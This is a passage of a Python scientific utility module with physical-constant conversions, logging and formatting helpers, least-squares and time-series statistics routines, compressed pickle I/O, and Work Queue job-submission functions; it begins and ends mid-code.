            package = "LPW-nifty.py"
        else:
            package = __name__.split('.')[0]
# Optional compression backends; the Have* flags gate lp_dump/lp_load below.
try:
    import bz2
    HaveBZ2 = True
except ImportError:
    logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
    HaveBZ2 = False
try:
    import gzip
    HaveGZ = True
except ImportError:
    logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
    HaveGZ = False
# The directory that this file lives in
rootdir = os.path.dirname(os.path.abspath(__file__))
# On 2020-05-07, these values were revised to CODATA 2018 values
# hartree-joule relationship   4.359 744 722 2071(85) e-18
# Hartree energy in eV         27.211 386 245 988(53)
# Avogadro constant            6.022 140 76 e23 (exact)
# molar gas constant           8.314 462 618 (exact)
# Boltzmann constant           1.380649e-23 (exact)
# Bohr radius                  5.291 772 109 03(80) e-11
# speed of light in vacuum     299 792 458 (exact)
# reduced Planck's constant    1.054571817e-34 (exact)
# calorie-joule relationship   4.184 J (exact; from NIST)
## Boltzmann constant in kJ mol^-1 k^-1
kb = 0.008314462618 # Previous value: 0.0083144100163
kb_si = 1.380649e-23
# Conversion factors
bohr2ang = 0.529177210903 # Previous value: 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5094740630558 # Previous value: 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.4996394798254 # Previous value: 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75258920567 # Previous value: 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
au2evang = 51.422067476325886 # Previous value: 51.42209166566339
evang2au = 1.0 / au2evang
c_lightspeed = 299792458.
hbar = 1.054571817e-34
avogadro = 6.02214076e23
au_mass = 9.1093837015e-31 # Atomic unit of mass in kg
amu_mass = 1.66053906660e-27 # Atomic mass unit in kg
amu2au = amu_mass / au_mass
cm2au = 100 * c_lightspeed * (2*np.pi*hbar) * avogadro / 1000 / au2kj # Multiply to convert cm^-1 to Hartree
ambervel2au = 9.349961132249932e-04 # Multiply to go from AMBER velocity unit Ang/(1/20.455 ps) to bohr/atu.
## Q-Chem to GMX unit conversion for energy
eqcgmx = au2kj # Previous value: 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -grad_au2gmx # Previous value: -49621.9
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
    """Log a 1-D vector on one line, each element printf-formatted.

    @param[in] vec1d a 1-D vector
    @param[in] precision digits after the decimal point
    @param[in] format printf conversion character ('e', 'f', ...)
    @param[in] loglevel logging level used for output
    """
    fmt = "%% .%i%s " % (precision, format)
    for elem in np.array(vec1d):
        logger.log(loglevel, fmt % elem)
    logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
    """Render a 1-D vector as a space-separated string, e.g. for keying a dictionary."""
    fmt = "%% .%ie " % precision
    return ' '.join(fmt % x for x in vec1d)
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
    """Log a 2-D array row by row, each element printf-formatted.

    @param[in] mat2d a 2-D array
    @param[in] precision digits after the decimal point
    @param[in] format printf conversion character ('e', 'f', ...)
    @param[in] loglevel logging level used for output
    """
    arr = np.array(mat2d)
    fmt = "%% .%i%s " % (precision, format)
    for row_vals in arr:
        for val in row_vals:
            logger.log(loglevel, fmt % val)
        # Newline after each row.
        logger.log(loglevel, '\n')
def grouper(iterable, n):
    """Split *iterable* into consecutive chunks of length <= n (last chunk may be short).

    NOTE: None elements are dropped, since None is zip_longest's fill value.
    """
    its = [iter(iterable)] * n
    return [[x for x in chunk if x is not None] for chunk in zip_longest(*its)]
def encode(l):
    """Run-length encode *l*, returning [[count, value], ...] for each run."""
    return [[len(list(run)), value] for value, run in itertools.groupby(l)]
def segments(e):
    """Turn run-length-encoded booleans into (begin, end) index pairs for the 1-runs.

    @param[in] e output of encode(): [[count, value], ...]
    """
    counts = [run[0] for run in e]
    # Start of each 1-run = total length of all preceding runs.
    begins = np.array([sum(counts[:j]) for j, run in enumerate(e) if run[1] == 1])
    lens = np.array([run[0] for run in e if run[1] == 1])
    return [(b, b + n) for b, n in zip(begins, lens)]
def commadash(l):
    """Format a 0-based index list as a compact 1-based string.

    e.g. [27, 28, 29, 30, 87] -> '28-31,88'.
    """
    ordered = sorted(l)
    if not ordered:
        return "(empty)"
    # Sentinel so the final run is terminated by the membership mask.
    ordered.append(ordered[-1] + 1)
    mask = [i in ordered for i in range(ordered[-1])]
    pieces = []
    for a, b in segments(encode(mask)):
        if b - 1 > a:
            pieces.append('%i-%i' % (a + 1, b))
        else:
            pieces.append('%i' % (a + 1))
    return ','.join(pieces)
def uncommadash(s):
    """Parse a 1-based comma/dash string like '27-31,88-91,100' into a 0-based index list.

    Raises RuntimeError on malformed tokens, non-positive entries, duplicates,
    or out-of-order input.
    """
    indices = []
    try:
        for token in s.split(','):
            fields = token.split('-')
            lo = int(fields[0]) - 1
            if len(fields) == 1:
                hi = int(fields[0])
            elif len(fields) == 2:
                hi = int(fields[1])
            else:
                logger.warning("Dash-separated list cannot exceed length 2\n")
                raise
            if lo < 0 or hi <= 0 or hi <= lo:
                if lo < 0 or hi <= 0:
                    logger.warning("Items in list cannot be zero or negative: %d %d\n" % (lo, hi))
                else:
                    logger.warning("Second number cannot be smaller than first: %d %d\n" % (lo, hi))
                raise
            span = range(lo, hi)
            if any(i in indices for i in span):
                logger.warning("Duplicate entries found in list\n")
                raise
            indices += span
        if sorted(indices) != indices:
            logger.warning("List is out of order\n")
            raise
    except:
        # Any failure above (including the bare raises) funnels here.
        logger.error('Invalid string for converting to list of numbers: %s\n' % s)
        raise RuntimeError
    return indices
def natural_sort(l):
    """Sort strings so embedded integers compare numerically ('x2' < 'x10'), case-insensitively."""
    def sort_key(s):
        # Split into digit / non-digit runs; digits compare as ints, text as lowercase.
        return [int(tok) if tok.isdigit() else tok.lower() for tok in re.split('([0-9]+)', s)]
    return sorted(l, key=sort_key)
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
    """Cool-looking printout for slick formatting of output.
    @param[in] text The string that the printout is based upon. This function
    will print out the string, ANSI-colored and enclosed in the symbol
    for example:\n
    <tt> ################# </tt>\n
    <tt> ### I am cool ### </tt>\n
    <tt> ################# </tt>
    @param[in] sym The surrounding symbol\n
    @param[in] bold Whether to use bold print
    @param[in] color The ANSI color:\n
    1 red\n
    2 green\n
    3 yellow\n
    4 blue\n
    5 magenta\n
    6 cyan\n
    7 white
    @param[in] ansi Raw ANSI attribute string (overrides color if given)
    @param[in] bottom The symbol for the bottom bar
    @param[in] minwidth The minimum width for the box, if the text is very short
    then we insert the appropriate number of padding spaces
    @param[in] center Whether to center each line (may be a per-line list)
    @param[in] sym2 Symbol used to build the top/bottom border line
    @return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
    """
    def newlen(l):
        # Visible length: strip ANSI escape sequences before counting.
        return len(re.sub(r"\x1b\[[0-9;]*m","",l))
    text = text.split('\n')
    width = max(minwidth,max([newlen(line) for line in text]))
    bar = ''.join([sym2 for i in range(width + 6)])
    bar = sym + bar + sym
    #bar = ''.join([sym for i in range(width + 8)])
    # Leading '\r' overwrites any partial status line on the terminal.
    logger.info('\r'+bar + '\n')
    for ln, line in enumerate(text):
        # center may be a list giving a per-line centering flag.
        if type(center) is list: c1 = center[ln]
        else: c1 = center
        if c1:
            padleft = ' ' * (int((width - newlen(line))/2))
        else:
            padleft = ''
        padright = ' '* (width - newlen(line) - len(padleft))
        if ansi is not None:
            ansi = str(ansi)
            logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
        elif color is not None:
            if color == 0 and bold:
                logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
            elif color == 0:
                logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
            else:
                # "9%i" selects the bright ANSI foreground color; "1;" adds bold.
                logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
            # if color == 3 or color == 7:
            #     print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
            # else:
            #     print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
        else:
            warn_press_key("Inappropriate use of printcool")
    logger.info(bar + '\n')
    botbar = ''.join([bottom for i in range(width + 8)])
    return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
    """See documentation for printcool; this is a nice way to print out keys/values in a dictionary.
    The keys in the dictionary are sorted before printing out (unless it is an
    OrderedDict, whose insertion order is preserved).  Entries whose value is
    None are skipped.
    @param[in] Dict The dictionary to be printed
    @param[in] title The title of the printout
    @param[in] keywidth Column width the keys are left-justified into
    @param[in] leftpad Number of spaces prepended to each printed line
    """
    if Dict is None: return
    bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
    # NOTE: the parameter deliberately shadows the builtin 'str' inside this helper.
    def magic_string(str):
        # This cryptic command returns a string with the number of characters specified as a variable. :P
        # Useful for printing nice-looking dictionaries, i guess.
        # print "\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"'))
        return eval("\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"')))
    if isinstance(Dict, OrderedDict):
        logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
    else:
        logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
    logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
    """ONLY matches integers! If you have a decimal point? None shall pass!
    @param[in] word String (for instance, '123', '153.0', '2.', '-354')
    @return answer Boolean which specifies whether the string is an integer (only +/- sign followed by digits)
    """
    try:
        word = str(word)
    except:
        return False
    # Bug fix: previously returned the raw re.match object despite the docstring
    # promising a Boolean; truthiness is unchanged for all existing callers.
    return re.match('^[-+]?[0-9]+$', word) is not None
def isfloat(word):
    """Matches ANY number; it can be a decimal, scientific notation, what have you
    CAUTION - this will also match an integer.  Fortran-style 'd'/'D' exponents
    are accepted as well.
    @param[in] word String (for instance, '123', '153.0', '2.', '-354')
    @return answer Boolean which specifies whether the string is any number
    """
    try: word = str(word)
    except: return False
    if len(word) == 0: return False
    # Bug fixes: (1) return a real bool rather than the match object;
    # (2) require at least one digit -- the old pattern accepted digit-free
    # strings like '+', '.', or 'e5', which float() then rejected with
    # ValueError in callers such as floatornan.
    return re.match(r'^[-+]?([0-9]+\.?[0-9]*|\.[0-9]+)([eEdD][-+]?[0-9]+)?$', word) is not None
def isdecimal(word):
    """Return whether *word* is a number containing a decimal point.

    See isint and isfloat: a decimal is anything isfloat accepts that isint rejects.
    @param[in] word String (for instance, '123', '153.0', '2.', '-354')
    """
    try:
        word = str(word)
    except:
        return False
    return isfloat(word) and not isint(word)
def floatornan(word):
    """Convert *word* to float, substituting a big sentinel for unparseable input.
    @param[in] word The string to be converted
    @return answer The string converted to a float; if not a float, return 1e10
    """
    big = 1e10
    if isfloat(word):
        return float(word)
    else:
        # Bug fix: the format string has two placeholders but was given a single
        # argument ("... % big"), raising TypeError whenever this branch ran.
        logger.info("Setting %s to % .1e\n" % (word, big))
        return big
def col(vec):
    """Return *vec* as a single-column 2-D array.

    @param[in] vec Any list, array, or matrix
    @return A 1-column 2D numpy array (a copy of the input data)
    """
    arr = np.array(vec)
    return arr.reshape(-1, 1)
def row(vec):
    """Return *vec* as a single-row 2-D array.

    @param[in] vec Any list, array, or matrix
    @return answer A 1-row 2D numpy array (a copy of the input data)
    """
    arr = np.array(vec)
    return arr.reshape(1, -1)
def flat(vec):
    """Return *vec* flattened into a single-index array.

    @param[in] vec The data to be flattened
    @return answer A 1-D numpy array (a copy of the input data)
    """
    arr = np.array(vec)
    return arr.reshape(-1)
def est124(val):
    """Round a positive value to the closest (in log space) number of the form
    1, 2, or 4 times a power of ten.
    """
    lg = np.log10(val)
    exponent = math.floor(lg)
    frac = lg - exponent
    # Midpoints (in log10) between candidate mantissas 1, 2, 4, 10.
    cutoffs = [(0.5 * (0.0 + 0.3010299956639812), 1.0),
               (0.5 * (0.3010299956639812 + 0.6020599913279624), 2.0),
               (0.5 * (0.6020599913279624 + 1.0), 4.0)]
    mantissa = 10.0
    for cut, m in cutoffs:
        if frac < cut:
            mantissa = m
            break
    return mantissa * 10 ** exponent
def est1234568(val):
    """Round a positive value to the closest (in log space) number of the form
    1, 2, 3, 4, 5, 6, or 8 times a power of ten.  Just because I don't like
    seven and nine.  Call me a numberist?
    """
    lg = np.log10(val)
    exponent = math.floor(lg)
    frac = lg - exponent
    mantissas = [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0]
    # Use the exact literals from the original table where they exist.
    logs = [0.0, 0.3010299956639812, np.log10(3), 0.6020599913279624,
            np.log10(5), np.log10(6), np.log10(8), 1.0]
    # Pick the first mantissa whose log-space midpoint exceeds frac.
    for j in range(len(mantissas) - 1):
        if frac < 0.5 * (logs[j] + logs[j + 1]):
            return mantissas[j] * 10 ** exponent
    return 10.0 * 10 ** exponent
def monotonic(arr, start, end):
    """In place, force *arr* to decrease monotonically from *start* toward *end*.

    Any stretch that rises is replaced by a linear interpolation between the
    last accepted value and the next lower one.  Works forward (end > start)
    or backward (end < start).
    """
    lowest = arr[start]
    anchor = start
    if end > start:
        for i in range(start + 1, end):
            if arr[i] < lowest:
                # Smooth over the non-decreasing stretch [anchor, i].
                arr[anchor:i+1] = np.linspace(lowest, arr[i], i - anchor + 1)
                lowest = arr[i]
                anchor = i
    if end < start:
        for i in range(start - 1, end - 1, -1):
            if arr[i] < lowest:
                arr[i:anchor+1] = np.linspace(arr[i], lowest, anchor - i + 1)
                lowest = arr[i]
                anchor = i
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
    """
    Return the indices of an array corresponding to strictly monotonic
    decreasing behavior.

    Scans from *start* toward *end* (either direction) and keeps an index only
    when its value is below every previously kept value.  Note: a forward scan
    stops before *end*, while a backward scan includes *end* (original behavior).

    Parameters
    ----------
    arr : numpy.ndarray
        Input array
    start : int
        Starting index (first element if None)
    end : int
        Ending index (last element if None)

    Returns
    -------
    indices : numpy.ndarray
        Selected indices
    """
    start = 0 if start is None else start
    end = len(arr) - 1 if end is None else end
    lowest = arr[start]
    chosen = [start]
    if verbose: logger.info("Starting @ %i : %.6f\n" % (start, arr[start]))
    if end > start:
        for i in range(start + 1, end):
            if arr[i] < lowest:
                lowest = arr[i]
                chosen.append(i)
                if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
            else:
                if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
    if end < start:
        for i in range(start - 1, end - 1, -1):
            if arr[i] < lowest:
                lowest = arr[i]
                chosen.append(i)
                if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
            else:
                if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
    return np.array(chosen)
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
    """Project out of *vec1* the component parallel to *vec2*.

    @param[in] vec1 The projectee (i.e. output is some modified version of vec1)
    @param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
    @return answer A copy of vec1 but with the vec2-component projected out.
    """
    unit = vec2 / np.linalg.norm(vec2)
    overlap = np.dot(vec1, unit)
    return vec1 - unit * overlap
def invert_svd(X, thresh=1e-12):
    """
    Invert a matrix using singular value decomposition.

    Singular values with absolute value at or below *thresh* are not inverted
    but zeroed, giving a pseudoinverse for (near-)singular matrices.

    @param[in] X The 2-D NumPy array containing the matrix to be inverted
    @param[in] thresh The SVD threshold; eigenvalues below this are not inverted but set to zero
    @return Xt The 2-D NumPy array containing the inverted matrix
    """
    u, s, vh = np.linalg.svd(X, full_matrices=0)
    s_inv = np.array([1. / sv if abs(sv) > thresh else 0.0 for sv in s])
    return multi_dot([np.transpose(vh), np.diag(s_inv), np.transpose(u)])
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
    """
    Weighted linear least-squares fit via the Moore-Penrose pseudoinverse.

    @code
     __                  __
    |                      |
    | 1 (x0) (x0)^2 (x0)^3 |
    | 1 (x1) (x1)^2 (x1)^3 |
    | 1 (x2) (x2)^2 (x2)^3 |
    | 1 (x3) (x3)^2 (x3)^3 |
    | 1 (x4) (x4)^2 (x4)^3 |
    |__                  __|
    @endcode

    @param[in] x (2-D array) An array of X-values (see above); a 1-D input is treated as a single column
    @param[in] y (array) An array of Y-values (only used in getting the least squares coefficients)
    @param[in] w (array) An array of weights, hopefully normalized to one.
    @param[in] thresh Unused; kept for backward compatibility of the signature.
    @return Beta The least-squares coefficients
    @return Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
    @return yfit The fitted y-values
    @return MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
    """
    # X is a 'tall' matrix.
    X = np.array(x)
    if len(X.shape) == 1:
        X = X[:,np.newaxis]
    Y = col(y)
    n_x = X.shape[0]
    n_fit = X.shape[1]
    if n_fit > n_x:
        logger.warning("Argh? It seems like this problem is underdetermined!\n")
    # Build the weight matrix.
    if w is not None:
        if len(w) != n_x:
            # Bug fix: the format arguments were previously "...% len(w), n_x",
            # which formatted a two-placeholder string with one argument and
            # raised TypeError instead of issuing this warning.
            warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % (len(w), n_x))
        # NOTE: in-place for ndarray input (callers receive normalized weights).
        w /= np.mean(w)
        WH = np.diag(w**0.5)
    else:
        WH = np.eye(n_x)
    # Make the Moore-Penrose Pseudoinverse.
    # if n_fit == n_x:
    #     MPPI = np.linalg.inv(WH*X)
    # else:
    # This resembles the formula (X'WX)^-1 X' W^1/2
    MPPI = np.linalg.pinv(np.dot(WH, X))
    Beta = multi_dot([MPPI, WH, Y])
    Hat = multi_dot([WH, X, MPPI])
    yfit = flat(np.dot(Hat, Y))
    # Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
    # We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
    return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
    """
    Compute the (cross) statistical inefficiency of (two) timeseries.

    Notes
    The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
    The fast method described in Ref [1] is used to compute g.

    References
    [1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
    histogram analysis method for the analysis of simulated and parallel tempering simulations.
    JCTC 3(1):26-41, 2007.

    Examples
    Compute statistical inefficiency of timeseries data with known correlation time.
    >>> import timeseries
    >>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
    >>> g = statisticalInefficiency(A_n, fast=True)

    @param[in] A_n (required, numpy array) - A_n[n] is nth value of
    timeseries A. Length is deduced from vector.
    @param[in] B_n (optional, numpy array) - B_n[n] is nth value of
    timeseries B. Length is deduced from vector. If supplied, the
    cross-correlation of timeseries A and B will be estimated instead of
    the autocorrelation of timeseries A.
    @param[in] fast (optional, boolean) - if True, will use faster (but
    less accurate) method to estimate correlation time, described in
    Ref. [1] (default: False)
    @param[in] mintime (optional, int) - minimum amount of correlation
    function to compute (default: 3) The algorithm terminates after
    computing the correlation time out to mintime when the correlation
    function furst goes negative. Note that this time may need to be
    increased if there is a strong initial negative peak in the
    correlation function.
    @param[in] warn (optional, boolean) - if True, warn (instead of staying
    silent) when the sample covariance is zero.
    @return g The estimated statistical inefficiency (equal to 1 + 2
    tau, where tau is the correlation time). We enforce g >= 1.0.
    """
    # Create numpy copies of input arguments.
    A_n = np.array(A_n)
    if B_n is not None:
        B_n = np.array(B_n)
    else:
        B_n = np.array(A_n)
    # Get the length of the timeseries.
    N = A_n.shape[0]
    # Be sure A_n and B_n have the same dimensions.
    if A_n.shape != B_n.shape:
        logger.error('A_n and B_n must have same dimensions.\n')
        # NOTE(review): ParameterError is not defined in this module; reaching
        # this line would raise NameError instead — confirm intended exception.
        raise ParameterError
    # Initialize statistical inefficiency estimate with uncorrelated value.
    g = 1.0
    # Compute mean of each timeseries.
    mu_A = A_n.mean()
    mu_B = B_n.mean()
    # Make temporary copies of fluctuation from mean.
    dA_n = A_n.astype(np.float64) - mu_A
    dB_n = B_n.astype(np.float64) - mu_B
    # Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
    sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
    # Trap the case where this covariance is zero, and we cannot proceed.
    if sigma2_AB == 0:
        if warn:
            logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
        return 1.0
    # Accumulate the integrated correlation time by computing the normalized correlation time at
    # increasing values of t. Stop accumulating if the correlation function goes negative, since
    # this is unlikely to occur unless the correlation function has decayed to the point where it
    # is dominated by noise and indistinguishable from zero.
    t = 1
    increment = 1
    while t < N-1:
        # compute normalized fluctuation correlation function at time t
        C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
        # Terminate if the correlation function has crossed zero and we've computed the correlation
        # function at least out to 'mintime'.
        if (C <= 0.0) and (t > mintime):
            break
        # Accumulate contribution to the statistical inefficiency.
        g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
        # Increment t and the amount by which we increment t.
        t += increment
        # Increase the interval if "fast mode" is on.
        if fast: increment += 1
    # g must be at least unity
    if g < 1.0: g = 1.0
    # Return the computed statistical inefficiency.
    return g
def mean_stderr(ts):
    """Return the mean and the correlation-corrected standard error of time series *ts*."""
    avg = np.mean(ts)
    # Inflate the naive error bar by the statistical inefficiency g.
    g = statisticalInefficiency(ts, warn=False)
    err = np.std(ts) * np.sqrt(g / len(ts))
    return avg, err
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
    """Column-wise statistical inefficiency of a 2-D timeseries array.

    Each column of *A_n* (and *B_n*, if given) is fed to statisticalInefficiency;
    the scalar result is broadcast down that column of the output.
    """
    n_row = A_n.shape[0]
    n_col = A_n.shape[-1]
    out = np.zeros((n_row, n_col))
    # Loop variable renamed from 'col', which shadowed the module-level col().
    for j in range(n_col):
        other = B_n if B_n is None else B_n[:, j]
        out[:, j] = statisticalInefficiency(A_n[:, j], other, fast, mintime, warn)
    return out
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
    """ Write an object to a zipped pickle file specified by the path.

    Compression backend is gzip if available, else bz2, else none.

    @param[in] obj Object to pickle
    @param[in] fnm Destination path (an existing symlink there is removed first)
    @param[in] protocol Pickle protocol number
    """
    # Safeguard against overwriting files? Nah.
    # if os.path.exists(fnm):
    #     logger.error("lp_dump cannot write to an existing path")
    #     raise IOError
    if os.path.islink(fnm):
        logger.warning("Trying to write to a symbolic link %s, removing it first\n" % fnm)
        os.unlink(fnm)
    if HaveGZ:
        f = gzip.GzipFile(fnm, 'wb')
    elif HaveBZ2:
        f = bz2.BZ2File(fnm, 'wb')
    else:
        f = open(fnm, 'wb')
    try:
        Pickler(f, protocol).dump(obj)
    finally:
        # Bug fix: previously the file handle leaked if dump() raised.
        f.close()
def lp_load(fnm):
    """ Read an object from a bzipped file specified by the path.

    Tries gzip first (if available), then bz2, then plain uncompressed pickle;
    each loader retries with latin1 encoding for pickles written by Python 2.
    Raises IOError if *fnm* does not exist.
    """
    if not os.path.exists(fnm):
        logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
        raise IOError
    # Last-resort loader: plain (uncompressed) pickle.
    def load_uncompress():
        logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
        f = open(fnm, 'rb')
        try:
            answer = Unpickler(f).load()
        except UnicodeDecodeError:
            # Pickle written by Python 2 — retry with latin1.
            answer = Unpickler(f, encoding='latin1').load()
        f.close()
        return answer
    def load_bz2():
        f = bz2.BZ2File(fnm, 'rb')
        try:
            answer = Unpickler(f).load()
        except UnicodeDecodeError:
            answer = Unpickler(f, encoding='latin1').load()
        f.close()
        return answer
    def load_gz():
        f = gzip.GzipFile(fnm, 'rb')
        try:
            answer = Unpickler(f).load()
        except UnicodeDecodeError:
            answer = Unpickler(f, encoding='latin1').load()
        f.close()
        return answer
    # Fallback chain gz -> bz2 -> uncompressed, gated by which modules imported.
    if HaveGZ:
        try:
            answer = load_gz()
        except:
            if HaveBZ2:
                try:
                    answer = load_bz2()
                except:
                    answer = load_uncompress()
            else:
                answer = load_uncompress()
    elif HaveBZ2:
        try:
            answer = load_bz2()
        except:
            answer = load_uncompress()
    else:
        answer = load_uncompress()
    return answer
#==============================#
#| Work Queue stuff |#
#==============================#
# Work Queue (CCTools) is an optional dependency; if the import fails, the
# WQ helper functions below will raise NameError when actually used.
try:
    import work_queue
except:
    pass
    #logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
    """Return the module-global Work Queue object (None if none was created)."""
    return WORK_QUEUE
def getWQIds():
    """Return the module-global mapping from target names to Work Queue task IDs."""
    return WQIDS
def createWorkQueue(wq_port, debug=True, name=package):
    """Create the module-global Work Queue master listening on *wq_port*.

    @param[in] wq_port Port number for the Work Queue master
    @param[in] debug If True, turn on verbose Work Queue debugging output
    @param[in] name Project name workers use to locate this master
    """
    global WORK_QUEUE
    if debug:
        work_queue.set_debug_flag('all')
    WORK_QUEUE = work_queue.WorkQueue(port=wq_port)
    WORK_QUEUE.specify_name(name)
    # QYD: prefer the worker that is fastest in previous tasks
    # another choice is first-come-first serve: WORK_QUEUE_SCHEDULE_FCFS
    WORK_QUEUE.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_TIME)
    # QYD: We don't want to specify the following extremely long keepalive times
    # because they will prevent checking "dead" workers, causing the program to wait forever
    #WORK_QUEUE.specify_keepalive_timeout(8640000)
    #WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
    """Drop the global Work Queue object and forget all recorded task IDs."""
    global WORK_QUEUE, WQIDS
    WORK_QUEUE = None
    WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
    """
    Submit a job to the Work Queue.

    Input/output files are specified by paths relative to the current working
    directory; the task ID is recorded in WQIDS under the target's name (or
    "None" when no target is given).

    @param[in] wq (Work Queue Object)
    @param[in] command (string) The command to run on the remote worker.
    @param[in] input_files (list of files) A list of locations of the input files.
    @param[in] output_files (list of files) A list of locations of the output files.
    @param[in] tag Task tag (defaults to the command itself)
    @param[in] tgt Target object whose .name keys the WQIDS bookkeeping
    @param[in] verbose Log a message on submission
    @param[in] print_time Threshold (seconds) attached to the task for later reporting
    """
    global WQIDS
    task = work_queue.Task(command)
    cwd = os.getcwd()
    for f in input_files:
        lf = os.path.join(cwd,f)
        task.specify_input_file(lf,f,cache=False)
    for f in output_files:
        lf = os.path.join(cwd,f)
        task.specify_output_file(lf,f,cache=False)
    if tag is None: tag = command
    task.specify_tag(tag)
    # Stored on the task; wq_wait1 uses it as the reporting threshold.
    task.print_time = print_time
    taskid = wq.submit(task)
    if verbose:
        logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
    if tgt is not None:
        WQIDS[tgt.name].append(taskid)
    else:
        WQIDS["None"].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
    """
    Submit a job to the Work Queue.  This function is a bit fancier in that we can explicitly
    specify where the input files come from, and where the output files go to.

    @param[in] wq (Work Queue Object)
    @param[in] command (string) The command to run on the remote worker.
    @param[in] input_files (list of 2-tuples) A list of local and
    remote locations of the input files.
    @param[in] output_files (list of 2-tuples) A list of local and
    remote locations of the output files.
    @param[in] tag Task tag (defaults to the command itself)
    @param[in] tgt Target object whose .name keys the WQIDS bookkeeping
    @param[in] verbose Log a message on submission
    @param[in] print_time Threshold (seconds) attached to the task for later reporting
    """
    global WQIDS
    task = work_queue.Task(command)
    for f in input_files:
        # print f[0], f[1]
        task.specify_input_file(f[0],f[1],cache=False)
    for f in output_files:
